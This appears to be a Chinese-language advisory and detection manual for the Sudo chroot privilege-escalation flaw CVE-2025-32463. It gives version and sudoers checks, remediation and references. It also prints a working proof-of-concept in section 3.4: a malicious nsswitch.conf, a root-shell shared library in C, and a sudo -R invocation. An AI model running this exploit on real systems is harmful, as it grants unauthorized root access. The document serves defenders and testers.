【必查漏洞】Sudo chroot 权限提升漏洞(CVE-2025-32463)检测手册

发布于 作者:

原文链接: https://mp.weixin.qq.com/s?__biz=MzIwNDYwMDcyNQ==&mid=2247489022&idx=2&sn=53623527ace09a34e233e4c555c6c6f8

【必查漏洞】Sudo chroot 权限提升漏洞(CVE-2025-32463)检测手册

安全狐 安全狐 2025-07-01 15:45

1. 漏洞概述

CVE-2025-32463
 是 Sudo 工具中的一个本地权限提升漏洞,影响 Sudo 1.9.14 至 1.9.17
 版本。该漏洞允许本地低权限用户通过滥用 

chroot

功能绕过安全限制,以 

root

权限执行任意代码。

漏洞原理

  • Sudo 在处理 
chroot

选项时,会在命令匹配阶段多次调用 

chroot()

,即使未配置相关规则。

  • 攻击者可利用 
chroot

指向一个可控目录,并在其中放置恶意 

nsswitch.conf

文件,导致 Sudo 加载恶意共享库(如 

libnss_*.so

),从而执行任意代码。

  • 漏洞根源在于 
pivot_root()

和 

unpivot_root()

函数在命令匹配阶段的错误调用逻辑。

2. 受影响版本

  • Sudo 1.9.14 – 1.9.17
    (默认配置下均受影响)

  • 已验证受影响系统

  • Ubuntu 24.04.1(Sudo 1.9.15p5, 1.9.16p2)

  • Fedora 41 Server(Sudo 1.9.15p5)

注意
:Sudo ≤ 1.8.32(旧版)不受影响,因未实现 

chroot

功能。

3. 漏洞检测方法

3.1 检查 Sudo 版本

运行以下命令检查当前 Sudo 版本: 

sudo --version | head -n 1

若版本在 1.9.14 – 1.9.17
 之间,则可能受影响。

3.2 检测是否存在 chroot 规则

检查 

/etc/sudoers

或 

/etc/sudoers.d/

文件中是否包含 

CHROOT=

或 

runchroot=*

规则: 

grep -r "CHROOT=" /etc/sudoers /etc/sudoers.d/ 2>/dev/null
grep -r "runchroot=" /etc/sudoers /etc/sudoers.d/ 2>/dev/null

若存在相关规则,系统可能面临更高风险。

3.3 检查日志中的 chroot 使用记录

查看系统日志(如 

/var/log/auth.log

或 

/var/log/secure

)中是否有 

CHROOT=

记录: 

grep "CHROOT=" /var/log/auth.log /var/log/secure 2>/dev/null

3.4 漏洞验证(PoC 测试)

警告
:此操作可能触发漏洞,仅限授权测试环境使用!非安专业人员请勿测试。
1. 创建临时目录并编写恶意 

nsswitch.conf


STAGE=$(mktemp -d /tmp/sudowoot.XXXXXX)
mkdir -p $STAGE/woot/etc
echo "passwd: /woot1337" > $STAGE/woot/etc/nsswitch.conf
  1. 编译恶意共享库: 
cat > $STAGE/woot1337.c <<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir(&#34;/&#34;);
  execl(&#34;/bin/bash&#34;, &#34;/bin/bash&#34;, NULL);
}
EOF
gcc -shared -fPIC -Wl,-init,woot -o $STAGE/libnss_/woot1337.so.2 $STAGE/woot1337.c
  1. 执行漏洞利用: 
sudo -R $STAGE/woot woot

预期结果
:若成功,将获得 

root

shell。

4. 修复建议

  1. 升级 Sudo
    :安装 Sudo 1.9.17p1 或更高版本
    (已修复漏洞)。

  2. 下载地址:https://www.sudo.ws/security/advisories/chroot_bug

  3. 禁用 chroot 功能
    (若无法立即升级):

  4. 检查并删除 

/etc/sudoers

中所有 

CHROOT=

或 

runchroot=*

规则。

  1. 监控日志
    :持续监控 
sudo

相关日志,检测异常 

chroot

使用行为。

5. 附录

  • Sudo 官方公告:https://www.sudo.ws/security/advisories/chroot_bug

  • CVE-2025-32463 漏洞详情:https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot

注意
:本手册仅供安全研究人员和系统管理员参考,未经授权禁止在真实环境中测试漏洞。